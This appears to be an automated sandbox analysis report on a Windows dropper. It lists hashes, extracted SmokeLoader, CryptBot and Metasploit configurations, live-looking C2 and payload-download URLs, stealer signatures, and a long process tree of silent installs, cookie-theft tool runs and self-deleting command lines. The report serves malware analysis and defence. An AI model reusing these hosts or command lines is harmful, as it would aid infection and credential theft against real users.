Analysis

  • max time kernel
    101s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    10-06-2021 02:03

General

  • Target

    E7A5D0D6F8FB4A360F9044EEC5BBD8A2.exe

  • Size

    3.2MB

  • MD5

    e7a5d0d6f8fb4a360f9044eec5bbd8a2

  • SHA1

    8fb211a6ff6ec0421230e41a757122ad9d121602

  • SHA256

    7b3d5985d238ea05b76ff24b955e265f6690468672c2319d5282f7b849ad9bd1

  • SHA512

    36f29220476e0b59fa8845327ba7c7aefb22f8f25a0cacfd442ed66c5bdafb9a6f44583b493a80125e4eaeb31a2a73e75a96bcee46817685c327577c2f260fe3

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

cryptbot

C2

olmqmc32.top

morovz03.top

Attributes
  • payload_url

    http://vamzcd04.top/download.php?file=lv.exe

Signatures

  • CryptBot

    A C++ stealer distributed widely in bundle with other software.

  • CryptBot Payload 2 IoCs
  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • ASPack v2.12-2.42 14 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 61 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 47 IoCs
  • Drops file in Windows directory 31 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 41 IoCs
  • Modifies system certificate store 2 TTPs 19 IoCs
  • Script User-Agent 10 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:860
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:588
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2604
      • C:\Windows\system32\msiexec.exe
        C:\Windows\system32\msiexec.exe /V
        2⤵
        • Enumerates connected drives
        • Drops file in Program Files directory
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2764
        • C:\Windows\syswow64\MsiExec.exe
          C:\Windows\syswow64\MsiExec.exe -Embedding DCC22EA471C0529F27D00F31A53CA85F C
          3⤵
            PID:2076
          • C:\Windows\syswow64\MsiExec.exe
            C:\Windows\syswow64\MsiExec.exe -Embedding 898163FC8E275C15B1F8FC6EDF24E9B6
            3⤵
              PID:2908
              • C:\Windows\SysWOW64\taskkill.exe
                "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                4⤵
                • Kills process with taskkill
                PID:2352
            • C:\Windows\syswow64\MsiExec.exe
              C:\Windows\syswow64\MsiExec.exe -Embedding 5FA422E9F4F55194F1467638AD926C86 M Global\MSI0000
              3⤵
                PID:3808
              • C:\Windows\syswow64\MsiExec.exe
                C:\Windows\syswow64\MsiExec.exe -Embedding D21B43A8A4CED9D0722991544D5C9103 C
                3⤵
                  PID:436
            • C:\Users\Admin\AppData\Local\Temp\E7A5D0D6F8FB4A360F9044EEC5BBD8A2.exe
              "C:\Users\Admin\AppData\Local\Temp\E7A5D0D6F8FB4A360F9044EEC5BBD8A2.exe"
              1⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1668
              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2020
                • C:\Users\Admin\AppData\Local\Temp\7zS4E798D94\setup_install.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS4E798D94\setup_install.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:268
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c metina_1.exe
                    4⤵
                    • Loads dropped DLL
                    PID:1012
                    • C:\Users\Admin\AppData\Local\Temp\7zS4E798D94\metina_1.exe
                      metina_1.exe
                      5⤵
                      • Executes dropped EXE
                      PID:1016
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c metina_4.exe
                    4⤵
                    • Loads dropped DLL
                    PID:304
                    • C:\Users\Admin\AppData\Local\Temp\7zS4E798D94\metina_4.exe
                      metina_4.exe
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:632
                      • C:\Users\Admin\AppData\Local\Temp\is-6JPPG.tmp\metina_4.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-6JPPG.tmp\metina_4.tmp" /SL5="$5012A,176358,92672,C:\Users\Admin\AppData\Local\Temp\7zS4E798D94\metina_4.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1356
                        • C:\Users\Admin\AppData\Local\Temp\is-1O48J.tmp\67________F.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-1O48J.tmp\67________F.exe" /S /UID=burnerch1
                          7⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          PID:2104
                          • C:\Program Files\Common Files\ZNVOPNKCUE\ultramediaburner.exe
                            "C:\Program Files\Common Files\ZNVOPNKCUE\ultramediaburner.exe" /VERYSILENT
                            8⤵
                            • Executes dropped EXE
                            PID:2404
                            • C:\Users\Admin\AppData\Local\Temp\is-BIJ09.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-BIJ09.tmp\ultramediaburner.tmp" /SL5="$401AA,281924,62464,C:\Program Files\Common Files\ZNVOPNKCUE\ultramediaburner.exe" /VERYSILENT
                              9⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious use of FindShellTrayWindow
                              PID:2416
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                10⤵
                                • Executes dropped EXE
                                PID:2520
                          • C:\Users\Admin\AppData\Local\Temp\69-962df-3af-a3bb5-c60ca88ff9b67\Rekuficiwa.exe
                            "C:\Users\Admin\AppData\Local\Temp\69-962df-3af-a3bb5-c60ca88ff9b67\Rekuficiwa.exe"
                            8⤵
                            • Executes dropped EXE
                            PID:1604
                            • C:\Program Files\Internet Explorer\iexplore.exe
                              "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                              9⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SetWindowsHookEx
                              PID:2504
                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2504 CREDAT:275457 /prefetch:2
                                10⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of SetWindowsHookEx
                                PID:1508
                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2504 CREDAT:472071 /prefetch:2
                                10⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of SetWindowsHookEx
                                PID:2244
                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2504 CREDAT:209947 /prefetch:2
                                10⤵
                                  PID:960
                            • C:\Users\Admin\AppData\Local\Temp\4e-f9553-ae6-44882-9163a3baad3a6\Xizhymetoxe.exe
                              "C:\Users\Admin\AppData\Local\Temp\4e-f9553-ae6-44882-9163a3baad3a6\Xizhymetoxe.exe"
                              8⤵
                              • Executes dropped EXE
                              PID:2376
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t0ux4bmh.1b4\001.exe & exit
                                9⤵
                                  PID:2380
                                  • C:\Users\Admin\AppData\Local\Temp\t0ux4bmh.1b4\001.exe
                                    C:\Users\Admin\AppData\Local\Temp\t0ux4bmh.1b4\001.exe
                                    10⤵
                                      PID:1608
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dj2gddai.ago\GcleanerEU.exe /eufive & exit
                                    9⤵
                                      PID:1668
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o3ah2d23.tdp\installer.exe /qn CAMPAIGN="654" & exit
                                      9⤵
                                        PID:2940
                                        • C:\Users\Admin\AppData\Local\Temp\o3ah2d23.tdp\installer.exe
                                          C:\Users\Admin\AppData\Local\Temp\o3ah2d23.tdp\installer.exe /qn CAMPAIGN="654"
                                          10⤵
                                          • Executes dropped EXE
                                          • Enumerates connected drives
                                          • Modifies system certificate store
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          • Suspicious use of FindShellTrayWindow
                                          PID:1896
                                          • C:\Windows\SysWOW64\msiexec.exe
                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\o3ah2d23.tdp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\o3ah2d23.tdp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1623038294 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                            11⤵
                                              PID:792
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qfkwzq3s.i14\gaoou.exe & exit
                                          9⤵
                                            PID:2836
                                            • C:\Users\Admin\AppData\Local\Temp\qfkwzq3s.i14\gaoou.exe
                                              C:\Users\Admin\AppData\Local\Temp\qfkwzq3s.i14\gaoou.exe
                                              10⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:2768
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                11⤵
                                                • Executes dropped EXE
                                                PID:2268
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                11⤵
                                                • Executes dropped EXE
                                                PID:2220
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zidxxqbr.woq\Setup3310.exe /Verysilent /subid=623 & exit
                                            9⤵
                                              PID:108
                                              • C:\Users\Admin\AppData\Local\Temp\zidxxqbr.woq\Setup3310.exe
                                                C:\Users\Admin\AppData\Local\Temp\zidxxqbr.woq\Setup3310.exe /Verysilent /subid=623
                                                10⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                PID:1960
                                                • C:\Users\Admin\AppData\Local\Temp\is-346AF.tmp\Setup3310.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-346AF.tmp\Setup3310.tmp" /SL5="$202DE,138429,56832,C:\Users\Admin\AppData\Local\Temp\zidxxqbr.woq\Setup3310.exe" /Verysilent /subid=623
                                                  11⤵
                                                  • Executes dropped EXE
                                                  • Modifies system certificate store
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:920
                                                  • C:\Users\Admin\AppData\Local\Temp\is-P2F01.tmp\Setup.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-P2F01.tmp\Setup.exe" /Verysilent
                                                    12⤵
                                                    • Executes dropped EXE
                                                    • Drops file in Program Files directory
                                                    PID:2344
                                                    • C:\Program Files (x86)\Data Finder\Versium Research\Aq7KJ3GWvdkS.exe
                                                      "C:\Program Files (x86)\Data Finder\Versium Research\Aq7KJ3GWvdkS.exe"
                                                      13⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                      PID:2744
                                                      • C:\Program Files (x86)\Data Finder\Versium Research\Aq7KJ3GWvdkS.exe
                                                        "C:\Program Files (x86)\Data Finder\Versium Research\Aq7KJ3GWvdkS.exe"
                                                        14⤵
                                                          PID:3640
                                                      • C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
                                                        "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
                                                        13⤵
                                                        • Executes dropped EXE
                                                        PID:2664
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          14⤵
                                                          • Executes dropped EXE
                                                          PID:3232
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          14⤵
                                                          • Executes dropped EXE
                                                          PID:3484
                                                      • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                        "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                        13⤵
                                                        • Executes dropped EXE
                                                        • Checks processor information in registry
                                                        PID:2324
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                          14⤵
                                                          • Executes dropped EXE
                                                          PID:2800
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /im RunWW.exe /f
                                                            15⤵
                                                            • Kills process with taskkill
                                                            PID:2732
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /t 6
                                                            15⤵
                                                            • Delays execution with timeout.exe
                                                            PID:3552
                                                      • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                        "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
                                                        13⤵
                                                          PID:2800
                                                          • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                            "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                            14⤵
                                                            • Modifies registry class
                                                            PID:3220
                                                        • C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
                                                          "C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                          13⤵
                                                            PID:3020
                                                            • C:\Users\Admin\AppData\Local\Temp\is-5PMUE.tmp\lylal220.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-5PMUE.tmp\lylal220.tmp" /SL5="$203C0,491750,408064,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                              14⤵
                                                              • Executes dropped EXE
                                                              PID:2320
                                                              • C:\Users\Admin\AppData\Local\Temp\is-SFJC6.tmp\56FT____________________.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-SFJC6.tmp\56FT____________________.exe" /S /UID=lylal220
                                                                15⤵
                                                                • Drops file in Drivers directory
                                                                • Executes dropped EXE
                                                                PID:3304
                                                                • C:\Program Files\Windows Portable Devices\WRVQUOBOZT\irecord.exe
                                                                  "C:\Program Files\Windows Portable Devices\WRVQUOBOZT\irecord.exe" /VERYSILENT
                                                                  16⤵
                                                                    PID:3384
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-CLDSH.tmp\irecord.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-CLDSH.tmp\irecord.tmp" /SL5="$20294,6139911,56832,C:\Program Files\Windows Portable Devices\WRVQUOBOZT\irecord.exe" /VERYSILENT
                                                                      17⤵
                                                                        PID:3440
                                                                        • C:\Program Files (x86)\recording\i-record.exe
                                                                          "C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu
                                                                          18⤵
                                                                            PID:4044
                                                                      • C:\Users\Admin\AppData\Local\Temp\41-c5878-f3e-4ad83-b225defde2637\Xagogojubae.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\41-c5878-f3e-4ad83-b225defde2637\Xagogojubae.exe"
                                                                        16⤵
                                                                          PID:3268
                                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                                            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                            17⤵
                                                                              PID:3524
                                                                          • C:\Users\Admin\AppData\Local\Temp\c2-2eb2b-0b1-497ba-9884fb087583a\Linusutemo.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\c2-2eb2b-0b1-497ba-9884fb087583a\Linusutemo.exe"
                                                                            16⤵
                                                                              PID:2896
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\42fagvej.wnr\001.exe & exit
                                                                                17⤵
                                                                                  PID:3620
                                                                                  • C:\Users\Admin\AppData\Local\Temp\42fagvej.wnr\001.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\42fagvej.wnr\001.exe
                                                                                    18⤵
                                                                                      PID:3764
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tvk2m2ly.gdk\GcleanerEU.exe /eufive & exit
                                                                                    17⤵
                                                                                      PID:3972
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\abpy20ot.4lp\installer.exe /qn CAMPAIGN="654" & exit
                                                                                      17⤵
                                                                                        PID:3380
                                                                                        • C:\Users\Admin\AppData\Local\Temp\abpy20ot.4lp\installer.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\abpy20ot.4lp\installer.exe /qn CAMPAIGN="654"
                                                                                          18⤵
                                                                                            PID:3588
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uraebo42.gfj\gaoou.exe & exit
                                                                                          17⤵
                                                                                            PID:3520
                                                                                            • C:\Users\Admin\AppData\Local\Temp\uraebo42.gfj\gaoou.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\uraebo42.gfj\gaoou.exe
                                                                                              18⤵
                                                                                                PID:3508
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  19⤵
                                                                                                    PID:3608
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    19⤵
                                                                                                      PID:2064
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lnswobyx.ejn\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                  17⤵
                                                                                                    PID:3132
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lnswobyx.ejn\Setup3310.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\lnswobyx.ejn\Setup3310.exe /Verysilent /subid=623
                                                                                                      18⤵
                                                                                                        PID:3512
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-MA4GP.tmp\Setup3310.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-MA4GP.tmp\Setup3310.tmp" /SL5="$20494,138429,56832,C:\Users\Admin\AppData\Local\Temp\lnswobyx.ejn\Setup3310.exe" /Verysilent /subid=623
                                                                                                          19⤵
                                                                                                            PID:3612
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-20SJN.tmp\Setup.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-20SJN.tmp\Setup.exe" /Verysilent
                                                                                                              20⤵
                                                                                                                PID:3984
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\553hz5qx.2bk\google-game.exe & exit
                                                                                                          17⤵
                                                                                                            PID:2916
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\553hz5qx.2bk\google-game.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\553hz5qx.2bk\google-game.exe
                                                                                                              18⤵
                                                                                                                PID:3420
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0jntzy5t.25k\GcleanerWW.exe /mixone & exit
                                                                                                              17⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3640
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pka3uvru.tck\005.exe & exit
                                                                                                              17⤵
                                                                                                                PID:3380
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\pka3uvru.tck\005.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\pka3uvru.tck\005.exe
                                                                                                                  18⤵
                                                                                                                    PID:3272
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gjyonhfx.vs5\toolspab1.exe & exit
                                                                                                                  17⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3020
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\gjyonhfx.vs5\toolspab1.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\gjyonhfx.vs5\toolspab1.exe
                                                                                                                    18⤵
                                                                                                                      PID:3932
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\gjyonhfx.vs5\toolspab1.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\gjyonhfx.vs5\toolspab1.exe
                                                                                                                        19⤵
                                                                                                                          PID:2216
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3u4b0b0p.4f3\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                      17⤵
                                                                                                                        PID:3620
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3u4b0b0p.4f3\installer.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\3u4b0b0p.4f3\installer.exe /qn CAMPAIGN="654"
                                                                                                                          18⤵
                                                                                                                            PID:1840
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hi5igpf1.rsg\702564a0.exe & exit
                                                                                                                          17⤵
                                                                                                                            PID:3224
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\hi5igpf1.rsg\702564a0.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\hi5igpf1.rsg\702564a0.exe
                                                                                                                              18⤵
                                                                                                                                PID:2724
                                                                                                                    • C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
                                                                                                                      "C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                      13⤵
                                                                                                                        PID:436
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-ICB1J.tmp\LabPicV3.tmp
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-ICB1J.tmp\LabPicV3.tmp" /SL5="$3037C,506086,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                          14⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:2588
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-CHNG6.tmp\_____________.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-CHNG6.tmp\_____________.exe" /S /UID=lab214
                                                                                                                            15⤵
                                                                                                                            • Drops file in Drivers directory
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Adds Run key to start application
                                                                                                                            • Drops file in Program Files directory
                                                                                                                            PID:3320
                                                                                                                            • C:\Program Files\Java\RCTQVJGIYB\prolab.exe
                                                                                                                              "C:\Program Files\Java\RCTQVJGIYB\prolab.exe" /VERYSILENT
                                                                                                                              16⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3796
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-R87LT.tmp\prolab.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-R87LT.tmp\prolab.tmp" /SL5="$602DC,575243,216576,C:\Program Files\Java\RCTQVJGIYB\prolab.exe" /VERYSILENT
                                                                                                                                17⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                PID:3824
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\d6-461b1-c9d-6d4b5-5eec2735a7174\Lidyhaezhyvae.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\d6-461b1-c9d-6d4b5-5eec2735a7174\Lidyhaezhyvae.exe"
                                                                                                                              16⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3872
                                                                                                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                17⤵
                                                                                                                                  PID:2684
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5c-41d68-8fc-bb29f-6acab7a515756\Haesheshecoxi.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\5c-41d68-8fc-bb29f-6acab7a515756\Haesheshecoxi.exe"
                                                                                                                                16⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:3988
                                                                                                                • C:\Windows\System32\cmd.exe
